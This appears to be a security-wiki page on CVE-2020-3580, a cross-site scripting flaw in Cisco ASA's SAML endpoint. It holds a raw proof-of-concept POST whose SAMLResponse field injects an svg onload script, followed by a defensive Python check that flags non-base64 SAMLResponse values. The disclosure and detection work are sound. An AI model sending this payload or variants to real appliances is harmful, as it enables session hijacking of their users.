CVE-2020-3580 Cisco ASA XSS Vulnerability
From PwnWiki
XSS
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: ciscoASA.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

SAMLResponse="><svg/onload=alert('PTSwarm')>
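A defender-side check for the request shown above, as an added example that is not part of the original page: in the SAML HTTP-POST binding the SAMLResponse field carries base64-encoded XML, so a POST to this endpoint whose value does not decode as base64 stands out in proxy or WAF logs. The function name, the verdict strings and the well-formed sample request are assumptions constructed for this example.

```python
import base64
import binascii
from urllib.parse import parse_qs, quote, urlsplit

ACS_PATH = "/+CSCOE+/saml/sp/acs"  # endpoint from the request on this page

# The request shown on this page.
POC_REQUEST = (
    "POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\r\n"
    "Host: ciscoASA.local\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 44\r\n\r\n"
    "SAMLResponse=\"><svg/onload=alert('PTSwarm')>"
)
# Constructed well-formed counterpart: base64-encoded XML, URL-encoded.
LEGIT_REQUEST = (
    "POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\r\n"
    "Host: ciscoASA.local\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "SAMLResponse=" + quote(base64.b64encode(b"<samlp:Response/>").decode(), safe="")
)


def check_acs_post(raw_request: str) -> str:
    """Classify one raw HTTP request: 'ignore', 'ok' or 'suspicious'."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return "ignore"
    method, target = parts[0], parts[1]
    if method != "POST" or urlsplit(target).path != ACS_PATH:
        return "ignore"
    values = parse_qs(body.strip(), keep_blank_values=True).get("SAMLResponse")
    if not values:
        return "suspicious"  # ACS post with no SAMLResponse field at all
    # parse_qs turns an unencoded '+' into a space; restore it before decoding.
    value = values[0].replace(" ", "+")
    try:
        xml = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "suspicious"  # not base64, e.g. raw markup as in POC_REQUEST
    # Decoded payload should at least look like an XML document.
    return "ok" if xml.lstrip().startswith(b"<") else "suspicious"


if __name__ == "__main__":
    for name, req in (("poc", POC_REQUEST), ("legit", LEGIT_REQUEST)):
        print(name, check_acs_post(req))
```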